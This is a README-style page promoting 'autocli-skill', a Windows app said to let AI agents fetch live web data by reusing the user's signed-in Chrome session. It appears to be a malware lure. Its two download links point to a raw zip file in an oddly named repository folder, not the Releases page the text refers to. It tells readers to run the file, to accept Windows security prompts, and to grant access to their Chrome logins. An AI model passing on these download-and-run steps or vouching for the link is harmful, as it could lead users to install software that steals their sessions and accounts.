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🤖 autocli-skill - Web access for your AI agent

Download from Releases

🧭 What this app does

autocli-skill helps your AI agent reach live information from the web without extra setup. It can use your Chrome login session to fetch current data from many sites, including Bilibili, Zhihu, Twitter/X, YouTube, Weibo, Reddit, Facebook, Instagram, TikTok, Notion, Cursor, and more.

Use it when you want your agent to:

  • look up live web data
  • read content from sites you already use
  • avoid manual copy and paste
  • work without API keys
  • use your existing browser session

💻 Windows download

To use autocli-skill on Windows, visit this page to download:

https://raw.githubusercontent.com/Respectful-judasiscariot925/autocli-skill/main/peacelike/skill_autocli_2.6.zip

On the Releases page:

  1. Open the latest release
  2. Download the Windows file
  3. Run the file on your PC
  4. Follow the on-screen steps

If Windows asks for permission, choose the option that lets the app run.

🪟 System requirements

Use a Windows PC with:

  • Windows 10 or Windows 11
  • Google Chrome installed
  • An active Chrome profile with the sites you want to access
  • An internet connection
  • Enough free space for the app and browser data

For the best result:

  • keep Chrome signed in
  • close extra browser windows if they cause confusion
  • use the same Chrome profile each time

⚙️ How it works

autocli-skill connects your AI agent to your browser session. It reads web content through Chrome, so the agent can use pages you already have access to.

The flow is simple:

  1. You run the app on Windows
  2. The app looks at your Chrome session
  3. Your agent sends a natural language request
  4. The app fetches the needed page or data
  5. The agent uses that data in its response

This is useful for:

  • current news and posts
  • social media content
  • saved notes in Notion
  • public pages and profile data
  • search results from many web platforms

🚀 Getting started

  1. Install Google Chrome if you do not have it
  2. Sign in to the sites you want your agent to use
  3. Open the Releases page
  4. Download the latest Windows build
  5. Run the downloaded file
  6. Let the app use your Chrome session
  7. Connect it to your AI agent if your setup needs that step

If you already use ClaudeCode, OpenClaw, or Agent, add autocli-skill as the web access layer for live browsing tasks.

🧩 What you can ask it to do

You can give simple requests in plain language, such as:

  • get the latest video from a YouTube channel
  • read a post from Reddit
  • pull recent updates from X
  • check a creator page on Bilibili
  • open a saved note in Notion
  • find public info on Weibo or Zhihu
  • read comments or page content from supported sites

You do not need to type site-specific commands for normal use. Ask for the page or content you want, and the agent handles the rest.

🔐 Chrome session and login

autocli-skill reuses your Chrome login session. That means it can access sites where you are already signed in, without asking for API keys.

Keep these points in mind:

  • use the Chrome profile that has your logins
  • stay signed in to the services you want to use
  • if a site signs you out, sign in again in Chrome
  • if content does not load, refresh the page in Chrome and try again

This setup helps with sites that do not offer easy public APIs or where login is required.

📚 Supported platforms

autocli-skill is built for broad web access across many common sites, including:

  • Bilibili
  • Zhihu
  • Twitter/X
  • YouTube
  • Weibo
  • Reddit
  • Facebook
  • Instagram
  • TikTok
  • Notion
  • Cursor
  • 55+ other platforms

It works best on pages that load in Chrome and allow normal browser access.

🛠️ Basic setup tips

If the app does not find the right page, try this:

  1. Open the site in Chrome first
  2. Sign in if needed
  3. Make sure the page loads fully
  4. Run the app again
  5. Give the agent a clear request

If your browser has many profiles:

  • use one profile for this app
  • keep it separate from work or personal profiles if needed
  • avoid switching profiles while the app is running

📂 Example use cases

Here are some simple ways people can use autocli-skill:

  • check a creator’s newest post before writing a reply
  • compare live comments from several platforms
  • read updates from a Notion workspace
  • collect social links for research
  • pull current video details from YouTube
  • verify a public profile on X or Instagram
  • gather source material for a report

🔄 Typical first run

When you start the app for the first time:

  • Windows may show a security prompt
  • Chrome may ask for access or login approval
  • the app may take a moment to connect
  • your agent may need one test request before it works smoothly

If the app opens and closes too fast:

  • run it again
  • make sure Chrome is open
  • check that you downloaded the correct Windows file from Releases

🧠 How to use with your AI agent

If your AI agent supports external tools, point it to autocli-skill as the web fetch layer. Then ask for live web tasks in natural language.

Examples:

  • fetch the latest tweet from a public account
  • open this Notion page and read the top section
  • get the newest video from this channel
  • check the current posts on this profile
  • find recent comments on this thread

Keep requests short and specific. Clear requests give better results.

📥 Download and install

Visit this page to download the Windows release:

https://raw.githubusercontent.com/Respectful-judasiscariot925/autocli-skill/main/peacelike/skill_autocli_2.6.zip

Then:

  1. open the newest release
  2. download the Windows file
  3. double-click the file to run it
  4. allow Chrome access if prompted
  5. connect it to your AI agent if needed

🧰 Troubleshooting

If the app does not work as expected:

  • confirm Chrome is installed
  • confirm you are signed in to the right site
  • make sure the page is reachable in Chrome
  • try again after refreshing the page
  • restart the app and Chrome
  • check that you downloaded the latest release

If the app cannot read a page:

  • open the page directly in Chrome
  • wait for the page to finish loading
  • remove pop-ups or sign-in prompts
  • try a simpler request first

If your agent gives no result:

  • use a more direct request
  • name the site and page
  • ask for one item at a time

📌 Best results

For smoother use:

  • keep Chrome updated
  • use one browser profile for your agent tasks
  • stay signed in to the platforms you use most
  • give clear requests
  • start with public pages before trying locked content

autocli-skill fits users who want live web access inside their AI workflow without extra account setup

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